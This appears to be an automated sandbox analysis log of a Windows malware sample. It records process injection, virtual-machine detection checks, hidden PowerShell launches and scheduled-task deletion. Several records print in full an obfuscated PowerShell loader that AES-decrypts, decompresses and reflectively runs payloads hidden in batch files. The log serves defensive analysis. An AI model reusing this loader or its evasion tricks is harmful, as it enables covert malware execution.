Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC29790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25235280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21EC07B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2527DEB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 286D7CE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC29790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25235280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1D547800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21EC07B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 286D7CE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1D547800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 19192FE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 19193100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 29BC05B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1FAFFD50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2271B950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22735E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1DAF18C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1DAF1910000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2127EAE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 176E8750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CD8B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CF3050000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22735C40000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\payload.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:gudwtndyxkts{param([outputtype([type])][parameter(position=0)][type[]]$eysutohjudxedh,[parameter(position=1)][type]$wayesupnic)$posiitcnxqz=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+'f'+[char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[char](100)+''+[char](68)+''+[char](101)+''+[char](108)+''+'e'+'g'+[char](97)+''+'t'+'e')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+'n'+''+'m'+''+'e'+''+[char](109)+'o'+[char](114)+''+'y'+'m'+[char](111)+''+[char](100)+''+[char](117)+''+[char](108)+''+[char](101)+'',$false).definetype(''+[char](77)+'y'+'d'+''+'e'+''+[char](108)+'e'+[char](103)+''+'a'+'t'+[char](101)+''+[char](84)+''+[char](121)+''+'p'+'e',''+[char](67)+''+[char](108)+''+[char](97)+'s'+[char](115)+''+[char](44)+''+'p'+''+'u'+''+[char](98)+''+[char](108)+'ic'+','+'s'+[char](101)+''+'a'+''+[char](108)+''+[char](101)+''+[char](100)+''+','+''+[char](65)+''+'n'+''+[char](115)+'i'+[char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[char](65)+''+[char](117)+'t'+'o'+''+'c'+''+'l'+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$posiitcnxqz.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+[char](112)+''+[char](101)+'ci'+'a'+''+'l'+''+[char](78)+''+[char](97)+''+[char](109)+''+[char](101)+',h'+[char](105)+'d'+'e'+''+'b'+''+[char](121)+''+[char](83)+''+[char](105)+'g'+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+''+[char](108)+''+'i'+'c',[reflection.callingconventions]::standard,$eysutohjudxedh).setimplementationflags(''+[char](82)+'un'+[char](116)+''+'i'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+'n'+''+[char](97)+''+'g'+''+[char](101)+''+'d'+'');$posiitcnxqz.definemethod(''+'i'+''+'n'+'v'+[char](111)+''+[char](107)+''+'e'+'',''+[char](80)+''+[char](117)+''+[char](98)+''+[char](108)+''+[char](105)+''+[char](99)+''+','+''+[char](72)+''+[char](105)+''+'d'+''+'e'+''+[char](66)+''+[char](121)+''+[char](83)+''+'i'+''+[char](103)+''+[char](44)+''+'n'+''+[char](101)+''+'w'+''+[char](83)+''+[char](108)+'o'+[char](116)+''+','+''+[char](86)+''+[char](105)+''+[char](114)+''+'t'+'u'+[char](97)+'l',$wayesupnic,$eysutohjudxedh).setimplementationflags(''+[char](82)+'u'+[char](110)+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+'a'+'n'+''+'a'+''+[char](103)+'e'+'d'+'');write-output $posiitcnxqz.createtype();}$cxukrbomemwqm=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+'ys'+'t'+''+[char](101)+''+'m'+'.d'+[char](108)+''+[char](108)+'')}).gettype(''+'m'+''+[char](105)+'c'+[char](114)+''+[char](111)+''+[char](115)+''+[char](111)+''+'f'+'t'+[char](46)+''+[char](87)+''+[char](105)+''+'n'+''+[char](51)+''+[char](50)+''+'.'+''+'u'+''+[char](110)+''+[char](115)+''+[char](97)+''+[
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\payload.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, 